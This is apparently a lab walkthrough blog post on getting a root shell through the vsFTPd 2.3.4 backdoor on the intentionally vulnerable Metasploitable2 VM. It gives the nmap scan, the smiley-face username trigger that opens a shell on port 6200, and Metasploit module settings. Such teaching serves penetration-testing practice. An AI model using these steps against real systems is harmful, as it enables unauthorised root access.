This is the first of our many blog posts, where we will be exploring different techniques to exploit Metasploitable2 machine. In this post, I will focus on ftp service running VSFTPD application.
The Metasploitable virtual machine created by Rapid7 is an intentionally vulnerable version of Ubuntu Linux designed for demonstrating common security vulnerabilities. This is the second version of Metasploitable and includes even more vulnerabilities than the original image. This virtual machine is compatible with VMware, Virtualbox and other common virtual machine platforms. Metasploitable’s network interfaces, by default are bound to the NAT and Host-Only network adapters. A video tutorial of how to install Metasploitable on Virtualbox is available on Rapid7 website.
After installing the virtual machine, go ahead and power it up; after it boots up login to console with username: msfadmin and password: msfadmin. Use the ifconfig command to verify the IP address of the machine.
In our case, the IP address of Metasploitable virtual machine is 10.0.19.235. And the machine that we will be using for attacking purposes, runs Kali Linux with IP address 10.0.18.250.
From our attacking machine, we identify the open ports on this virtual machine using a little tool called nmap. The following command will scan for all 65535 TCP ports on our vulnerable virtual machine.
root@SPaWn:~# nmap -p1-65535 10.0.19.235
You can see lots of open ports in the above screenshot, but we will only focus on FTP port 21 for now.
Since we have made no secret to what application is running behind port 21 (VSFTPD), and in actual penetration testing scenarios we don’t know what service is running behind which port, therefore we will proceed as such.
Let’s do a bit in-depth scan against port 21 using nmap.
Nmap can also used as a vulnerability scanner by leveraging multitudes of scripts provided with it. This “Scripting Engine” feature is what makes nmap a very powerful tool during penetration testing assignments.
Our scan clearly indicates that this version of vsFTPd contains a backdoor and can be exploited to gain a root shell. After going through the reference pages from our last nmap scan, we found out that if a username is sent that ends with a “:)” smiley face, the backdoor’d version of vsFTPd will open a listening shell on port 6200.
Let’s first check the status of port 6200 on our vulnerable virtual machine using netcat.
A “Connection refused” message signals that the port on target machine is closed. Now connect to FTP service and provide username: letmein:) and password: hahaha.
Let’s check the status of port 6200 now.
Our vulnerable machine is listening on port 6200 and connecting to this port now will give us a root shell.
To exploit this vulnerability using metasploit framework, type the command “msfconsole” from your Kali Linux command prompt. Once the metasploit is launched, search for “VSFTPD”. You will probably get only one hit against your search, and then use this exploit with the following command.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
After selecting your exploit, set the values to make the exploit work, such as the following:
set RHOST W.X.Y.Z
set PAYLOAD cmd/unix/interact
set LHOST A.B.C.D
set LPORT 12345
where W.X.Y.Z and A.B.C.D are the IP addresses of our Target and Attacking machines respectively. After setting the values for the VSFTPD backdoor exploit, we can either use the command “run” or “exploit” to fire the exploit against target machine. A successful exploitation will get us a root shell.
Method-3: Exploit code
You can also create an exploit code for this vulnerability in any language of your choice. Since we are already familiar with how this vulnerability affects the product, therefore we are using an exploit code written in our favorite language python. This exploit requires two parameters 1. IP address of the target machine and 2. port number. After firing the exploit, we will get a root shell.